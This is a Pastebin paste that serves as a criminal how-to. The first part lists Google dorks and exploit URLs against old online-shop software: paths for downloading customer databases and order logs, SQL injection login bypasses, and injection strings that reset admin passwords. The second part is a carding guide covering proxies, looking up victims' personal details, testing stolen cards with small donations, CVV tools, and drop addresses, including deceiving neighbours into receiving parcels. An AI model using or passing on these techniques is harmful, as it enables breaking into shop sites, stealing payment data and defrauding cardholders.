API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 17th, 2011
909
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.71 KB | None | 0 0
raw download clone embed print report
  1. google dork :--> allinurl:/cart32.exe/
  2. target looks :--> http://www.xxxxxx.net/wrburns_s/cgi-...xe/NoItemFound
  3. chage NoItemFound whit error
  4. When we found Page error dig installation information beneath it, meant us was successful!
  5. If shares this was gotten list file the format/the suffix.C32 significant in site.Gotten file contained the data cc
  6. Copy some file.C32 was or all of them to notepad or the program text the other editor.
  7. The substitute string url tsb.To like this: http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
  8. paste one by one, file.C32 at the end url has been modified earlier, with the format http://www.xxxxx.com/cart32/
  9.  
  10.  
  11.  
  12.  
  13. 2-
  14. google dork :--> inurl:"/cart.php?m="
  15. target looks lile :--> http://xxxxxxx.com/store/cart.php?m=view
  16. exploit: chage cart.php?m=view to /admin
  17. target whit exploit :--> http://xxxxxx.com/store/admin
  18. Usename : 'or"="
  19. Password : 'or"="
  20.  
  21.  
  22.  
  23. 3-
  24. google dork :--> allinurlroddetail.asp?prod=
  25. target looks like :--> http://www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
  26. exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
  27. target whit exploit :--> http://www.xxxxxx.org/fpdb/vsproducts.mdb
  28.  
  29.  
  30. 4-
  31. google dork :--> allinurl: /cgi-local/shopper.cgi
  32. target looks like :--> http://www.xxxxxx.com/cgi-local/shop...dd=action&key=
  33. exploit :--> ...&template=order.log
  34. target whit exploit :--> http://www.xxxxxxxx.com/cgi-local/sh...late=order.log
  35.  
  36.  
  37. 5-
  38. google dork :--> allinurl: Lobby.asp
  39. target looks like :--> http://www.xxxxx.com/mall/lobby.asp
  40. exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
  41. target whit exploit :--> http://www.xxxxx.com/fpdb/shop.mdb
  42.  
  43.  
  44. 6-
  45. google dork :--> allinurl:/vpasp/shopsearch.asp
  46. when u find a target put this in search box
  47. Keyword=&category=5); insert into tbluser (fldusername) values
  48. ('')--&SubCategory=&hide=&action.x=46&action.y=6
  49. Keyword=&category=5); update tbluser set fldpassword='' where
  50. fldusername=''--&SubCategory=All&action.x=33&action.y=6
  51. Keyword=&category=3); update tbluser set fldaccess='1' where
  52. fldusername=''--&SubCategory=All&action.x=33&action.y=6
  53. Jangan lupa untuk mengganti dan nya terserah kamu.
  54. Untuk mengganti password admin, masukkan keyword berikut :
  55. Keyword=&category=5); update tbluser set fldpassword='' where
  56. fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
  57.  
  58. login page: http://xxxxxxx/vpasp/shopadmin.asp
  59.  
  60.  
  61. 7-
  62. google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
  63. target looks like :--> http://xxxxxxx.com/vpasp/shopdisplay...asp?cat=xxxxxx
  64. exploit :--> http://xxxxxxx.com/vpasp/shopdisplaypro ... ion%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
  65. if this is not working try this ends
  66. %20'a%25'--
  67. %20'b%25'--
  68. %20'c%25'--
  69. after finding user and pass go to login page:
  70. http://xxxx.com/vpasp/shopadmin.asp
  71.  
  72.  
  73.  
  74. 8-
  75. google dork :--> allinurl:/shopadmin.asp
  76. target looks like :--> http://www.xxxxxx.com/shopadmin.asp
  77. exploit:
  78. user : 'or'1
  79. pass : 'or'1
  80.  
  81.  
  82. 9-
  83. google.com :--> allinurl:/store/index.cgi/page=
  84. target looks like :--> http://www.xxxxxx.com/cgi-bin/store/...short_blue.htm
  85. exploit :--> ../admin/files/order.log
  86. target whit exploit :--> http://www.xxxxxxx.com/cgi-bin/store...iles/order.log
  87.  
  88.  
  89. 10-
  90. google.com:--> allinurl:/metacart/
  91. target looks like :--> http://www.xxxxxx.com/metacart/about.asp
  92. exploit :--> /database/metacart.mdb
  93. target whit exploit :--> http://www.xxxxxx.com/metacart/database/metacart.mdb
  94.  
  95.  
  96. 11-
  97. google.com:--> allinurl:/DCShop/
  98. target looks like :--> http://www.xxxxxx.com/xxxx/DCShop/xxxx
  99. exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
  100. target whit exploit :--> http://www.xxxx.com/xxxx/DCShop/orders/orders.txt or http://www.xxxx.com/xxxx/DCShop/Orders/orders.txt
  101.  
  102.  
  103. 12-
  104. google.com:--> allinurl:/shop/category.asp/catid=
  105. target looks like :--> http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
  106. exploit :--> /admin/dbsetup.asp
  107. target whit exploit :--> http://www.xxxxxx.com/admin/dbsetup.asp
  108. after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
  109. target for dl the data base :--> http://www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
  110. in db look for access to find pass and user of shop admins.
  111.  
  112.  
  113. 13-
  114. google.com:--> allinurl:/commercesql/
  115. target looks like :--> http://www.xxxxx.com/commercesql/xxxxx
  116. exploit :--> cgi-bin/commercesql/index.cgi?page=
  117. target whit exploit admin config :--> http://www.xxxxxx.com/cgi-bin/commer... ... in_conf.pl
  118. target whit exploit admin manager :--> http://www.xxxxxx.com/cgi-bin/commer...in/manager.cgi
  119. target whit exploit order.log :--> http://www.xxxxx.com/cgi-bin/commerc...iles/order.log
  120.  
  121.  
  122. 14-
  123. google.com:--> allinurl:/eshop/
  124. target looks like :--> http://www.xxxxx.com/xxxxx/eshop
  125. exploit :-->/cg-bin/eshop/database/order.mdb
  126. target whit exploit :--> http://www.xxxxxx.com/.../cg-bin/e....base/order.mdb
  127. after dl the db look at access for user and password !
  128.  
  129.  
  130. How to use cc
  131. -The first and forth most thing to do is use a proxy. This is a good site that will give you fresh new proxy and will list them by country so you can IP the card to the right country. XROXT Alive Proxy N N Time
  132.  
  133. -Next what you need to do in order to get the credit card to work is find all the information on your person (from card name) if you don't have it already. One of the best ways i came across is using online tools from different searching sites. Here are a few that I use to find out all my information. (only works to search us citizens except for Zaba Search which works internationally). Email Finder US Search Zaba Search Peek You USA People Search Look Up Anyone Skip Ease
  134.  
  135. -Another thing you must do is learn how to use the card right the first time you use it. The biggest mistake anyone can make is by going online with the card and making a purchase of over $30 USD. Why you might ask that this is a mistake? Well let me tell you, most credit card companies don't want you to make online purchases because of the risk involved with scams and fraud so what they usually do is only allow $30 USD as the limit. One way to get around this is by first going to a donation site, my favorite is Red Cross, and then you donate $1 USD to verify if the card has not already been limited or blocked/locked. If you manage to successfully make a donation then you are good to go and make purchases over $30 USD.
  136.  
  137. -One of the things I do if i'm missing the cvc/ccv/cvv/cvn is use a program that will receive the number for you automatically. Here is the link to the downlod for the program I use. CVV2 Retriever
  138.  
  139. -Hey but what about if i know the name of the person on the card but I don't know what country they are from because they are outside the US? well here is two great programs in one rar file i use to retrieve this info. Firstly I will explain how you use these correctly. Take a look at the card number on the front of the card or on the source of the number. Take the first six numbers on the card and remember them. These are called the BIN numbers or Bank Identification Numbers. They are what banks use to let the other banks and companies know what bank issued the card. If the first number on the card is a 3 then it is an AMEX card, if it is a 4 then its VISA, 5 is MasterCard and 6 is Discover. Bank Bin List
  140.  
  141. -The biggest thing to do when you are using the card online is have the credit card company, bank, or website company deny your order after you make the purchase and its accepted. The way i avoid this is when buying an actually physical objects (say an iPod or Video Game) is to have the item sent to a drop box location. What you say is a drop box location? Well its basically a location that is not your actual address. Some examples are a house that is for sale in your neighborhood that is vacant at the moment or a lot on the street that is having a building or house built there. Some other examples are a P.O. Box location (Post Office) but just remember to look on the manufacturers website to see if P.O. Boxes are allowed to be shipped too. And last but not least is a random persons house in your neighborhood or apartment/ condo-complex. Why a random persons house? well what you do is call the person up and in a convincing voice explain to them that you accidentally typed your street address in wrong and ask if they can hold it for you while you go pick it up.
  142.  
  143. -The last thing to consider when using a credit card online is to not use it on the same site more then a few times, to keep it active, and not to use it on any site that has the Verified By VISA or MasterCard® SecureCode™ logos on its site.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!